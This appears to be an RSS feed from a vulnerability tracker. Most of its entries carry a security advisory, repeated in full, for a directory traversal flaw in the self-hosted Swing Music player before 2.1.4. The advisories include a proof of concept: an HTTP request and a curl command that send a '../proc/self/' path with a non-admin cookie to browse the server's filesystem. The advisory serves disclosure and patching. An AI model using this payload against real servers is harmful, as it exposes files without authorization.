<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 20:09:26 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-266033</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-266033</link>
      <description>EUVD-2026-266033</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-266033</guid>
    </item>
    <item>
      <title>fkie_cve-2026-23877</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-23877</link>
      <description>&lt;p&gt;Swing Music is a self-hosted music player for local audio files. Prior to version 2.1.4, Swing Music&amp;#39;s `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem. Version 2.1.4 fixes the issue.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Swing Music is a self-hosted music player for local audio files. Prior to version 2.1.4, Swing Music&amp;#39;s `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem. Version 2.1.4 fixes the issue.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-23877</guid>
    </item>
    <item>
      <title>GHSA-pj88-9xww-gxmh — Swing Music has a Directory Traversal &amp; Filesystem can be accessed by a non-admin user</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-pj88-9xww-gxmh</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: swingmusic&lt;/p&gt;
&lt;p&gt;### Summary
Swing Music&amp;#39;s `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem.&lt;/p&gt;
&lt;p&gt;### Details
The `@api.post(&amp;#34;/dir-browser&amp;#34;)` endpoint lacks proper path validation and authorization checks:
- **No authorization requirement**: Any authenticated user can access the endpoint
- **Improper path handling**: The code attempts to prepend &amp;#34;/&amp;#34; to non-existent paths but this doesn&amp;#39;t prevent traversal:
```python
req_dir = pathlib.Path(&amp;#34;../../../../etc&amp;#34;)  # → PosixPath(&amp;#39;../../../../etc&amp;#39;)
if not req_dir.exists():                    # → False
    req_dir = &amp;#34;/&amp;#34; / req_dir                 # → PosixPath(&amp;#39;/../../../../etc&amp;#39;)
```&lt;/p&gt;
&lt;p&gt;### PoC
1. Create a non-admin user
2. Authenticate as a non-admin user
3. Send the following request:
```
POST /folder/dir-browser HTTP/1.1
Host: IP:1970
Content-Type: application/json
Cookie: access_token_cookie=non-admin-access-token
Connection: keep-alive&lt;/p&gt;
&lt;p&gt;{&amp;#34;folder&amp;#34;:&amp;#34;/music/../proc/self/&amp;#34;, &amp;#34;tracks_only&amp;#34;:false}
```
```bash
curl --path-as-is -i -s -k -X $&amp;#39;POST&amp;#39; -H $&amp;#39;Content-Type: application/json&amp;#39; -b $&amp;#39;access_token_cookie=non-admin-access-token&amp;#39; \
    --data-binary $&amp;#39;{\&amp;#34;folder\&amp;#34;:\&amp;#34;/music/../proc/self/\&amp;#34;, \&amp;#34;tracks_only\&amp;#34;:false}&amp;#39; \
    $&amp;#39;http://IP:1970/folder/dir-browser&amp;#39;
```
4. The response will list directories from `/proc/self` instead of restricting to user-accessible paths:
```
HTTP/1.1 200 OK
Content-Type: ap…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: swingmusic&lt;/p&gt;
&lt;p&gt;### Summary
Swing Music&amp;#39;s `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem.&lt;/p&gt;
&lt;p&gt;### Details
The `@api.post(&amp;#34;/dir-browser&amp;#34;)` endpoint lacks proper path validation and authorization checks:
- **No authorization requirement**: Any authenticated user can access the endpoint
- **Improper path handling**: The code attempts to prepend &amp;#34;/&amp;#34; to non-existent paths but this doesn&amp;#39;t prevent traversal:
```python
req_dir = pathlib.Path(&amp;#34;../../../../etc&amp;#34;)  # → PosixPath(&amp;#39;../../../../etc&amp;#39;)
if not req_dir.exists():                    # → False
    req_dir = &amp;#34;/&amp;#34; / req_dir                 # → PosixPath(&amp;#39;/../../../../etc&amp;#39;)
```&lt;/p&gt;
&lt;p&gt;### PoC
1. Create a non-admin user
2. Authenticate as a non-admin user
3. Send the following request:
```
POST /folder/dir-browser HTTP/1.1
Host: IP:1970
Content-Type: application/json
Cookie: access_token_cookie=non-admin-access-token
Connection: keep-alive&lt;/p&gt;
&lt;p&gt;{&amp;#34;folder&amp;#34;:&amp;#34;/music/../proc/self/&amp;#34;, &amp;#34;tracks_only&amp;#34;:false}
```
```bash
curl --path-as-is -i -s -k -X $&amp;#39;POST&amp;#39; -H $&amp;#39;Content-Type: application/json&amp;#39; -b $&amp;#39;access_token_cookie=non-admin-access-token&amp;#39; \
    --data-binary $&amp;#39;{\&amp;#34;folder\&amp;#34;:\&amp;#34;/music/../proc/self/\&amp;#34;, \&amp;#34;tracks_only\&amp;#34;:false}&amp;#39; \
    $&amp;#39;http://IP:1970/folder/dir-browser&amp;#39;
```
4. The response will list directories from `/proc/self` instead of restricting to user-accessible paths:
```
HTTP/1.1 200 OK
Content-Type: ap…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-pj88-9xww-gxmh</guid>
    </item>
    <item>
      <title>PYSEC-2026-1947 — Swing Music has a Directory Traversal &amp; Filesystem can be accessed by a non-admin user</title>
      <link>https://cve.radiocsirt.org/vuln/pysec-2026-1947</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: swingmusic&lt;/p&gt;
&lt;p&gt;### Summary
Swing Music&amp;#39;s `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem.&lt;/p&gt;
&lt;p&gt;### Details
The `@api.post(&amp;#34;/dir-browser&amp;#34;)` endpoint lacks proper path validation and authorization checks:
- **No authorization requirement**: Any authenticated user can access the endpoint
- **Improper path handling**: The code attempts to prepend &amp;#34;/&amp;#34; to non-existent paths but this doesn&amp;#39;t prevent traversal:
```python
req_dir = pathlib.Path(&amp;#34;../../../../etc&amp;#34;)  # → PosixPath(&amp;#39;../../../../etc&amp;#39;)
if not req_dir.exists():                    # → False
    req_dir = &amp;#34;/&amp;#34; / req_dir                 # → PosixPath(&amp;#39;/../../../../etc&amp;#39;)
```&lt;/p&gt;
&lt;p&gt;### PoC
1. Create a non-admin user
2. Authenticate as a non-admin user
3. Send the following request:
```
POST /folder/dir-browser HTTP/1.1
Host: IP:1970
Content-Type: application/json
Cookie: access_token_cookie=non-admin-access-token
Connection: keep-alive&lt;/p&gt;
&lt;p&gt;{&amp;#34;folder&amp;#34;:&amp;#34;/music/../proc/self/&amp;#34;, &amp;#34;tracks_only&amp;#34;:false}
```
```bash
curl --path-as-is -i -s -k -X $&amp;#39;POST&amp;#39; -H $&amp;#39;Content-Type: application/json&amp;#39; -b $&amp;#39;access_token_cookie=non-admin-access-token&amp;#39; \
    --data-binary $&amp;#39;{\&amp;#34;folder\&amp;#34;:\&amp;#34;/music/../proc/self/\&amp;#34;, \&amp;#34;tracks_only\&amp;#34;:false}&amp;#39; \
    $&amp;#39;http://IP:1970/folder/dir-browser&amp;#39;
```
4. The response will list directories from `/proc/self` instead of restricting to user-accessible paths:
```
HTTP/1.1 200 OK
Content-Type: ap…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: swingmusic&lt;/p&gt;
&lt;p&gt;### Summary
Swing Music&amp;#39;s `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem.&lt;/p&gt;
&lt;p&gt;### Details
The `@api.post(&amp;#34;/dir-browser&amp;#34;)` endpoint lacks proper path validation and authorization checks:
- **No authorization requirement**: Any authenticated user can access the endpoint
- **Improper path handling**: The code attempts to prepend &amp;#34;/&amp;#34; to non-existent paths but this doesn&amp;#39;t prevent traversal:
```python
req_dir = pathlib.Path(&amp;#34;../../../../etc&amp;#34;)  # → PosixPath(&amp;#39;../../../../etc&amp;#39;)
if not req_dir.exists():                    # → False
    req_dir = &amp;#34;/&amp;#34; / req_dir                 # → PosixPath(&amp;#39;/../../../../etc&amp;#39;)
```&lt;/p&gt;
&lt;p&gt;### PoC
1. Create a non-admin user
2. Authenticate as a non-admin user
3. Send the following request:
```
POST /folder/dir-browser HTTP/1.1
Host: IP:1970
Content-Type: application/json
Cookie: access_token_cookie=non-admin-access-token
Connection: keep-alive&lt;/p&gt;
&lt;p&gt;{&amp;#34;folder&amp;#34;:&amp;#34;/music/../proc/self/&amp;#34;, &amp;#34;tracks_only&amp;#34;:false}
```
```bash
curl --path-as-is -i -s -k -X $&amp;#39;POST&amp;#39; -H $&amp;#39;Content-Type: application/json&amp;#39; -b $&amp;#39;access_token_cookie=non-admin-access-token&amp;#39; \
    --data-binary $&amp;#39;{\&amp;#34;folder\&amp;#34;:\&amp;#34;/music/../proc/self/\&amp;#34;, \&amp;#34;tracks_only\&amp;#34;:false}&amp;#39; \
    $&amp;#39;http://IP:1970/folder/dir-browser&amp;#39;
```
4. The response will list directories from `/proc/self` instead of restricting to user-accessible paths:
```
HTTP/1.1 200 OK
Content-Type: ap…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/pysec-2026-1947</guid>
    </item>
  </channel>
</rss>
